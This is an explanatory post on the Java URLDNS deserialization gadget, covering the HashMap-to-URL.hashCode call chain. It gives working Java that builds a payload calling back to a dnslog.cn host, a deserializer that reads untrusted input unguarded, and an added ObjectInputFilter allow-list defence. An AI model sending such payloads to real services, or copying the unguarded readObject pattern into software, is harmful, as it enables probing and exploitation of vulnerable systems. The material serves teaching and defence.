Full call chain

HashMap.readObject()
HashMap.hash()
URL.hashCode()
URLStreamHandler.hashCode()
URLStreamHandler.getHostAddress()
InetAddress.getByName()

Deserializing the HashMap re-hashes every key; for a java.net.URL key whose cached hashCode field is -1, URL.hashCode() delegates to the stream handler, which resolves the host name and so emits a DNS query.
Serialization code (imports added; the original listing omitted them)

    import java.io.FileOutputStream;
    import java.io.ObjectOutputStream;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.util.HashMap;

    public class dnsTest {
        public static void main(String[] args) throws Exception {
            HashMap<URL, Integer> hashMap = new HashMap<>();
            URL url = new URL("http://jk5cy7.dnslog.cn");
            // On JDK 16+ this reflective access needs
            // --add-opens java.base/java.net=ALL-UNNAMED
            Class<?> c = URL.class;
            Field fieldHashcode = c.getDeclaredField("hashCode");
            fieldHashcode.setAccessible(true);
            // Any value other than -1 makes URL.hashCode() return the cached value,
            // so put() does not resolve the host during payload generation
            fieldHashcode.set(url, 233);
            hashMap.put(url, 22);
            // Reset to -1 so the lookup only happens when the map is deserialized
            fieldHashcode.set(url, -1);
            Serialize(hashMap);
        }

        public static void Serialize(Object obj) throws Exception {
            // 1. Create the serialization stream
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.txt"));
            // 2. Write out the object
            objectOutputStream.writeObject(obj);
            // 3. Release the resource
            objectOutputStream.close();
        }
    }
Deserialization code (imports added)

    import java.io.FileInputStream;
    import java.io.ObjectInputStream;

    public class Deserialize {
        public static void main(String[] args) throws Exception {
            Deserialize();
        }

        public static void Deserialize() throws Exception {
            ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.txt"));
            // readObject() rebuilds the HashMap and re-hashes the URL key, which triggers the DNS lookup
            Object object = objectInputStream.readObject();
            System.out.println("object = " + object);
            objectInputStream.close();
        }
    }
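The consumer above calls readObject() on an untrusted stream with no restriction on which classes may be instantiated. The example below is an addition to this page, not code from the original post: it shows the same deserialization step guarded by a JEP 290 ObjectInputFilter (Java 9+) that allows only the classes the consumer expects. The class name FilteredDeserialize, the allow-list contents and the hostname urldns-example.invalid are assumptions chosen for the demonstration; the payload is built the same way as in the post, and the filter rejects java.net.URL at class-resolution time, before any URL object exists and therefore before URL.hashCode() can run.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;
import java.util.Set;

// Added example (not from the original post): readObject() guarded by an
// allow-list ObjectInputFilter so the URLDNS gadget is refused.
public class FilteredDeserialize {

    // Classes this consumer legitimately expects in the stream (assumed for the demo).
    // java.lang.Number is listed because Integer's serializable superclass
    // descriptor is also presented to the filter.
    private static final Set<Class<?>> ALLOWED = Set.of(
            HashMap.class, Integer.class, Number.class, String.class);

    static final ObjectInputFilter FILTER = info -> {
        Class<?> c = info.serialClass();
        // The filter is also invoked for depth/reference-count checks with no class;
        // leave those undecided so the stream's other limits still apply.
        if (c == null) {
            return ObjectInputFilter.Status.UNDECIDED;
        }
        while (c.isArray()) {
            c = c.getComponentType(); // judge arrays by their element type
        }
        return ALLOWED.contains(c)
                ? ObjectInputFilter.Status.ALLOWED
                : ObjectInputFilter.Status.REJECTED; // java.net.URL ends up here
    };

    // Deserialize with the allow-list filter installed on this stream only.
    public static Object readFiltered(byte[] data) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(obj);
        }
        return bos.toByteArray();
    }

    // Same construction as the post's dnsTest, pointed at a reserved,
    // non-resolvable hostname (constructed placeholder). On JDK 16+ this needs
    // --add-opens java.base/java.net=ALL-UNNAMED to touch URL.hashCode.
    static byte[] urldnsPayload() throws Exception {
        HashMap<URL, Integer> map = new HashMap<>();
        URL url = new URL("http://urldns-example.invalid");
        Field hashCode = URL.class.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.set(url, 233);  // not -1: put() will not resolve the host now
        map.put(url, 22);
        hashCode.set(url, -1);   // -1: readObject() -> hash() -> URL.hashCode() would resolve it
        return serialize(map);
    }

    public static void main(String[] args) throws Exception {
        // Expected input passes the filter unchanged.
        HashMap<String, Integer> benign = new HashMap<>();
        benign.put("count", 1);
        System.out.println("benign map accepted: " + readFiltered(serialize(benign)));

        // The URLDNS payload is refused while resolving the java.net.URL class descriptor.
        try {
            readFiltered(urldnsPayload());
            System.out.println("URLDNS payload was NOT blocked");
        } catch (InvalidClassException e) {
            // Thrown by ObjectInputStream when the filter returns REJECTED:
            // no URL instance is created, so no hashCode() call and no DNS query.
            System.out.println("URLDNS payload blocked: " + e.getMessage());
        }
    }
}
```

A per-stream filter as above is the narrowest fix; the same allow-list can be applied process-wide with the jdk.serialFilter system property (pattern syntax, for example -Djdk.serialFilter='java.util.HashMap;java.lang.Integer;java.lang.Number;java.lang.String;!*') so that every ObjectInputStream in the JVM is covered, including ones in third-party code that never calls setObjectInputFilter.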
A plain-language analogy for the whole call chain:
A noodle shop throws in a free egg with every order, and has never once forgotten.
Xiao Ming loves noodles and always orders takeout from this shop (serialization).
One day Xiao Ming asks his younger brother to pick up the order, and the brother eats the egg in one bite (modifying the value via reflection).
When Xiao Ming starts eating (deserialization) he sees there is no egg today and immediately knows his brother ate it (a deserialization vulnerability exists).